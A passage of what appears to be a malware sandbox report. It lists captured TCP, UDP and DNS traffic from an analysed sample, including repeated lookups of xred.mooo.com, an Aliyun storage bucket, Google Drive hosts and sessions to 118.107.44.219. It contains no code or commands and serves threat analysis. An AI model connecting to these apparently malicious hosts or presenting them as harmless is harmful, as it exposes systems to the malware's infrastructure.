                                                                                                                                                                    Dec 30, 2024 05:01:45.458791018 CET1909150264118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:01:45.459420919 CET5026419091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 05:01:47.391613007 CET5026519092192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 05:01:47.396564960 CET1909250265118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:01:47.396737099 CET5026519092192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 05:01:55.298875093 CET5026519092192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 05:01:55.303921938 CET1909250265118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:01:55.303936005 CET1909250265118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:01:55.303944111 CET1909250265118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:01:55.303962946 CET1909250265118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:01:55.870677948 CET1909250265118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:01:55.870927095 CET5026519092192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 05:01:55.875766993 CET1909250265118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:02:04.625868082 CET5026519092192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 05:02:04.630846977 CET1909250265118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:02:04.926230907 CET1909250265118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:02:05.001327991 CET5026519092192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 05:02:05.213848114 CET5026519092192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 05:02:05.218749046 CET1909250265118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:02:22.016407967 CET5026519092192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 05:02:22.021368027 CET1909250265118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:02:22.316890001 CET1909250265118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:02:22.406981945 CET5026519092192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 05:02:22.497392893 CET5026519092192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 05:02:22.502166986 CET1909250265118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:02:37.813364983 CET5026519092192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 05:02:37.819264889 CET1909250265118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:02:38.114826918 CET1909250265118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:02:38.205434084 CET5026519092192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 05:02:38.313431978 CET5026519092192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 05:02:38.318240881 CET1909250265118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:02:54.328175068 CET5026519092192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 05:02:54.333163023 CET1909250265118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:02:54.628793001 CET1909250265118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:02:54.704063892 CET5026519092192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 05:02:54.791477919 CET5026519092192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 05:02:54.796331882 CET1909250265118.107.44.219192.168.2.4

                                                                                                                                                                    UDP Packets

                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                    Dec 30, 2024 04:59:01.780667067 CET5407453192.168.2.41.1.1.1
                                                                                                                                                                    Dec 30, 2024 04:59:01.970598936 CET53540741.1.1.1192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:07.037955999 CET6274753192.168.2.41.1.1.1
                                                                                                                                                                    Dec 30, 2024 04:59:07.044559956 CET53627471.1.1.1192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:07.911679983 CET5025253192.168.2.41.1.1.1
                                                                                                                                                                    Dec 30, 2024 04:59:08.038033962 CET53502521.1.1.1192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:08.041115046 CET6539553192.168.2.41.1.1.1
                                                                                                                                                                    Dec 30, 2024 04:59:08.050077915 CET53653951.1.1.1192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:08.135755062 CET5952653192.168.2.41.1.1.1
                                                                                                                                                                    Dec 30, 2024 04:59:08.142846107 CET53595261.1.1.1192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:12.693552017 CET5222753192.168.2.41.1.1.1
                                                                                                                                                                    Dec 30, 2024 04:59:12.700465918 CET53522271.1.1.1192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.233557940 CET5567253192.168.2.41.1.1.1
                                                                                                                                                                    Dec 30, 2024 04:59:13.240827084 CET53556721.1.1.1192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.243558884 CET284703478192.168.2.41.192.136.170
                                                                                                                                                                    Dec 30, 2024 04:59:13.243597031 CET284713478192.168.2.41.192.136.170
                                                                                                                                                                    Dec 30, 2024 04:59:13.243629932 CET284713478192.168.2.41.192.136.170
                                                                                                                                                                    Dec 30, 2024 04:59:13.329173088 CET284703478192.168.2.41.192.136.170
                                                                                                                                                                    Dec 30, 2024 04:59:13.329194069 CET284713478192.168.2.41.192.136.170
                                                                                                                                                                    Dec 30, 2024 04:59:13.329207897 CET284713478192.168.2.41.192.136.170
                                                                                                                                                                    Dec 30, 2024 04:59:13.331015110 CET5119653192.168.2.41.1.1.1
                                                                                                                                                                    Dec 30, 2024 04:59:13.332196951 CET5980953192.168.2.41.1.1.1
                                                                                                                                                                    Dec 30, 2024 04:59:13.338097095 CET53511961.1.1.1192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.342242002 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                    Dec 30, 2024 04:59:13.545320034 CET53598091.1.1.1192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.550556898 CET284703478192.168.2.41.192.136.170
                                                                                                                                                                    Dec 30, 2024 04:59:13.550626993 CET284713478192.168.2.41.192.136.170
                                                                                                                                                                    Dec 30, 2024 04:59:13.550648928 CET284713478192.168.2.41.192.136.170
                                                                                                                                                                    Dec 30, 2024 04:59:13.766165972 CET284703478192.168.2.41.192.136.170
                                                                                                                                                                    Dec 30, 2024 04:59:13.766196966 CET284713478192.168.2.41.192.136.170
                                                                                                                                                                    Dec 30, 2024 04:59:13.766230106 CET284713478192.168.2.41.192.136.170
                                                                                                                                                                    Dec 30, 2024 04:59:13.987543106 CET284703478192.168.2.41.192.136.170
                                                                                                                                                                    Dec 30, 2024 04:59:13.987581015 CET284713478192.168.2.41.192.136.170
                                                                                                                                                                    Dec 30, 2024 04:59:13.987596035 CET284713478192.168.2.41.192.136.170
                                                                                                                                                                    Dec 30, 2024 04:59:14.203480959 CET284703478192.168.2.41.192.136.170
                                                                                                                                                                    Dec 30, 2024 04:59:14.203531981 CET284713478192.168.2.41.192.136.170
                                                                                                                                                                    Dec 30, 2024 04:59:14.203531981 CET284713478192.168.2.41.192.136.170
                                                                                                                                                                    Dec 30, 2024 04:59:14.349760056 CET5795653192.168.2.41.1.1.1
                                                                                                                                                                    Dec 30, 2024 04:59:14.357651949 CET53579561.1.1.1192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:14.423329115 CET284703478192.168.2.41.192.136.170
                                                                                                                                                                    Dec 30, 2024 04:59:14.423377037 CET284713478192.168.2.41.192.136.170
                                                                                                                                                                    Dec 30, 2024 04:59:14.423398972 CET284713478192.168.2.41.192.136.170
                                                                                                                                                                    Dec 30, 2024 04:59:17.375365973 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                    Dec 30, 2024 04:59:17.651715994 CET5318853192.168.2.41.1.1.1
                                                                                                                                                                    Dec 30, 2024 04:59:17.653306961 CET5620153192.168.2.41.1.1.1
                                                                                                                                                                    Dec 30, 2024 04:59:17.958836079 CET53531881.1.1.1192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:18.351447105 CET53562011.1.1.1192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:18.876960993 CET5096653192.168.2.41.1.1.1
                                                                                                                                                                    Dec 30, 2024 04:59:18.883945942 CET53509661.1.1.1192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:24.563920975 CET6525553192.168.2.41.1.1.1
                                                                                                                                                                    Dec 30, 2024 04:59:24.571327925 CET53652551.1.1.1192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:25.469080925 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                    Dec 30, 2024 04:59:31.360856056 CET5258653192.168.2.41.1.1.1
                                                                                                                                                                    Dec 30, 2024 04:59:31.367862940 CET53525861.1.1.1192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:35.892323971 CET5548953192.168.2.41.1.1.1
                                                                                                                                                                    Dec 30, 2024 04:59:35.899194956 CET53554891.1.1.1192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:41.547276974 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                    Dec 30, 2024 04:59:41.564086914 CET5911453192.168.2.41.1.1.1
                                                                                                                                                                    Dec 30, 2024 04:59:41.570924044 CET53591141.1.1.1192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:48.361255884 CET5080653192.168.2.41.1.1.1
                                                                                                                                                                    Dec 30, 2024 04:59:48.368267059 CET53508061.1.1.1192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:52.942694902 CET5165353192.168.2.41.1.1.1
                                                                                                                                                                    Dec 30, 2024 04:59:52.950088978 CET53516531.1.1.1192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:04.844310999 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                    Dec 30, 2024 05:00:06.395620108 CET6502853192.168.2.41.1.1.1
                                                                                                                                                                    Dec 30, 2024 05:00:06.404266119 CET53650281.1.1.1192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:18.188107967 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                    Dec 30, 2024 05:00:21.031910896 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                    Dec 30, 2024 05:00:21.141344070 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                    Dec 30, 2024 05:00:21.250451088 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                    Dec 30, 2024 05:00:21.363451958 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                    Dec 30, 2024 05:00:21.472424984 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                    Dec 30, 2024 05:00:21.604806900 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                    Dec 30, 2024 05:00:21.705646992 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:21.807642937 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:21.986015081 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                    Dec 30, 2024 05:00:22.074594975 CET80100041.192.136.132192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:22.672445059 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                    Dec 30, 2024 05:00:22.782171965 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                    Dec 30, 2024 05:00:22.891092062 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                    Dec 30, 2024 05:00:23.000583887 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                    Dec 30, 2024 05:00:23.038311005 CET80100041.192.136.132192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:23.108567953 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:23.109864950 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                    Dec 30, 2024 05:00:23.219563007 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                    Dec 30, 2024 05:00:23.328702927 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                    Dec 30, 2024 05:00:23.438050985 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                    Dec 30, 2024 05:00:23.443321943 CET80100041.192.136.132192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:23.547451973 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                    Dec 30, 2024 05:00:23.551148891 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:23.657161951 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                    Dec 30, 2024 05:00:23.766170025 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                    Dec 30, 2024 05:00:23.875596046 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                    Dec 30, 2024 05:00:23.891807079 CET80100041.192.136.132192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:23.992732048 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:24.043504000 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                    Dec 30, 2024 05:00:24.095017910 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                    Dec 30, 2024 05:00:24.203515053 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                    Dec 30, 2024 05:00:24.317001104 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                    Dec 30, 2024 05:00:24.373792887 CET80100041.192.136.132192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:24.416003942 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:24.422566891 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                    Dec 30, 2024 05:00:24.532380104 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                    Dec 30, 2024 05:00:24.654472113 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                    Dec 30, 2024 05:00:24.770729065 CET80100041.192.136.132192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:24.853574038 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:25.081974030 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                    Dec 30, 2024 05:00:25.389641047 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                    Dec 30, 2024 05:00:25.625391960 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                    Dec 30, 2024 05:00:25.734826088 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                    Dec 30, 2024 05:00:25.844551086 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                    Dec 30, 2024 05:00:25.953563929 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                    Dec 30, 2024 05:00:26.062908888 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                    Dec 30, 2024 05:00:26.124650955 CET80100041.192.136.132192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:26.172805071 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                    Dec 30, 2024 05:00:26.174119949 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:26.281661034 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                    Dec 30, 2024 05:00:26.392266035 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                    Dec 30, 2024 05:00:26.507997036 CET80100041.192.136.132192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:26.508833885 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                    Dec 30, 2024 05:00:26.610054016 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                    Dec 30, 2024 05:00:26.720351934 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                    Dec 30, 2024 05:00:26.829020023 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                    Dec 30, 2024 05:00:26.939482927 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                    Dec 30, 2024 05:00:26.939927101 CET80100041.192.136.132192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:27.047188044 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:27.047585011 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                    Dec 30, 2024 05:00:27.159519911 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                    Dec 30, 2024 05:00:27.267035007 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                    Dec 30, 2024 05:00:27.376305103 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                    Dec 30, 2024 05:00:27.417602062 CET80100041.192.136.132192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:27.481281042 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:27.489121914 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                    Dec 30, 2024 05:00:27.596013069 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                    Dec 30, 2024 05:00:27.704582930 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                    Dec 30, 2024 05:00:27.829871893 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                    Dec 30, 2024 05:00:27.917885065 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:27.936239004 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                    Dec 30, 2024 05:00:28.591722012 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                    Dec 30, 2024 05:00:28.688045025 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                    Dec 30, 2024 05:00:28.797488928 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                    Dec 30, 2024 05:00:31.097842932 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                    Dec 30, 2024 05:00:33.501004934 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                    Dec 30, 2024 05:00:36.125596046 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                    Dec 30, 2024 05:00:38.535388947 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                    Dec 30, 2024 05:00:40.938529968 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                    Dec 30, 2024 05:00:43.126885891 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                    Dec 30, 2024 05:00:43.458865881 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:43.577306986 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                    Dec 30, 2024 05:00:45.650002003 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                    Dec 30, 2024 05:00:48.266361952 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                    Dec 30, 2024 05:00:48.623589039 CET80100041.192.136.132192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:48.772195101 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                    Dec 30, 2024 05:00:49.102538109 CET80100041.192.136.132192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:49.359966040 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                    Dec 30, 2024 05:00:49.681196928 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:49.687998056 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                    Dec 30, 2024 05:00:50.018275976 CET80100041.192.136.132192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:50.125623941 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                    Dec 30, 2024 05:00:50.470223904 CET80100041.192.136.132192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:50.563026905 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                    Dec 30, 2024 05:00:52.859961987 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                    Dec 30, 2024 05:00:53.195503950 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:53.297884941 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                    Dec 30, 2024 05:00:53.618940115 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:53.625582933 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                    Dec 30, 2024 05:00:53.955815077 CET80100041.192.136.132192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:53.965677977 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                    Dec 30, 2024 05:00:57.125843048 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                    Dec 30, 2024 05:00:59.750763893 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                    Dec 30, 2024 05:01:02.813150883 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                    Dec 30, 2024 05:01:05.984992027 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                    Dec 30, 2024 05:01:06.325289965 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:01:06.860398054 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                    Dec 30, 2024 05:01:09.703912020 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                    Dec 30, 2024 05:01:12.000921011 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                    Dec 30, 2024 05:01:14.081176043 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                    Dec 30, 2024 05:01:16.594532013 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                    Dec 30, 2024 05:01:19.767782927 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                    Dec 30, 2024 05:01:22.173166037 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                    Dec 30, 2024 05:01:24.579376936 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                    Dec 30, 2024 05:01:24.901624918 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:01:24.907249928 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                    Dec 30, 2024 05:01:27.422727108 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                    Dec 30, 2024 05:01:29.727037907 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                    Dec 30, 2024 05:01:32.016411066 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                    Dec 30, 2024 05:01:34.094774008 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                    Dec 30, 2024 05:01:36.391892910 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                    Dec 30, 2024 05:01:39.016311884 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                    Dec 30, 2024 05:01:39.344160080 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:01:39.344571114 CET1000480192.168.2.41.192.136.133
                                                                                                                                                                    Dec 30, 2024 05:01:41.425254107 CET1000480192.168.2.41.192.136.134
                                                                                                                                                                    Dec 30, 2024 05:01:44.047807932 CET1000480192.168.2.41.192.136.135
                                                                                                                                                                    Dec 30, 2024 05:01:44.371907949 CET80100041.192.136.135192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:02:56.344826937 CET1000480192.168.2.41.192.136.132
                                                                                                                                                                    Dec 30, 2024 05:02:56.677130938 CET80100041.192.136.132192.168.2.4

                                                                                                                                                                    DNS Queries

                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                    Dec 30, 2024 04:59:01.780667067 CET192.168.2.41.1.1.10x4679Standard query (0)bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.comA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:07.037955999 CET192.168.2.41.1.1.10xd19dStandard query (0)docs.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:07.911679983 CET192.168.2.41.1.1.10xfec8Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:08.041115046 CET192.168.2.41.1.1.10xda62Standard query (0)freedns.afraid.orgA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:08.135755062 CET192.168.2.41.1.1.10x4f59Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:12.693552017 CET192.168.2.41.1.1.10xbdccStandard query (0)s.360.cnA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:13.233557940 CET192.168.2.41.1.1.10xe790Standard query (0)st.p.360.cnA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:13.331015110 CET192.168.2.41.1.1.10x1ec7Standard query (0)tr.p.360.cnA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:13.332196951 CET192.168.2.41.1.1.10x38e4Standard query (0)agt.p.360.cnA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:14.349760056 CET192.168.2.41.1.1.10x1eb4Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:17.651715994 CET192.168.2.41.1.1.10xc5dcStandard query (0)agd.p.360.cnA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:17.653306961 CET192.168.2.41.1.1.10xb804Standard query (0)pinst.360.cnA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:18.876960993 CET192.168.2.41.1.1.10xeef2Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:24.563920975 CET192.168.2.41.1.1.10x4113Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:31.360856056 CET192.168.2.41.1.1.10x4b05Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:35.892323971 CET192.168.2.41.1.1.10xef30Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:41.564086914 CET192.168.2.41.1.1.10x69b7Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:48.361255884 CET192.168.2.41.1.1.10x99f3Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:52.942694902 CET192.168.2.41.1.1.10x11e0Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 05:00:06.395620108 CET192.168.2.41.1.1.10x5764Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false

                                                                                                                                                                    DNS Answers

                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                    Dec 30, 2024 04:59:01.970598936 CET1.1.1.1192.168.2.40x4679No error (0)bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com47.79.48.211A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:07.044559956 CET1.1.1.1192.168.2.40xd19dNo error (0)docs.google.com142.250.181.238A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:08.038033962 CET1.1.1.1192.168.2.40xfec8Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:08.050077915 CET1.1.1.1192.168.2.40xda62No error (0)freedns.afraid.org69.42.215.252A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:08.142846107 CET1.1.1.1192.168.2.40x4f59No error (0)drive.usercontent.google.com142.250.186.129A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:12.700465918 CET1.1.1.1192.168.2.40xbdccNo error (0)s.360.cn180.163.251.230A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:12.700465918 CET1.1.1.1192.168.2.40xbdccNo error (0)s.360.cn180.163.251.231A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:12.700465918 CET1.1.1.1192.168.2.40xbdccNo error (0)s.360.cn101.198.2.147A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:12.700465918 CET1.1.1.1192.168.2.40xbdccNo error (0)s.360.cn171.8.167.89A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:13.240827084 CET1.1.1.1192.168.2.40xe790No error (0)st.p.360.cn1.192.136.170A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:13.338097095 CET1.1.1.1192.168.2.40x1ec7No error (0)tr.p.360.cn1.192.136.132A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:13.338097095 CET1.1.1.1192.168.2.40x1ec7No error (0)tr.p.360.cn1.192.136.135A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:13.338097095 CET1.1.1.1192.168.2.40x1ec7No error (0)tr.p.360.cn1.192.136.134A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:13.338097095 CET1.1.1.1192.168.2.40x1ec7No error (0)tr.p.360.cn1.192.136.133A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:13.545320034 CET1.1.1.1192.168.2.40x38e4No error (0)agt.p.360.cn1.192.136.132A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:13.545320034 CET1.1.1.1192.168.2.40x38e4No error (0)agt.p.360.cn1.192.136.133A (IP address)IN (0x0001)false
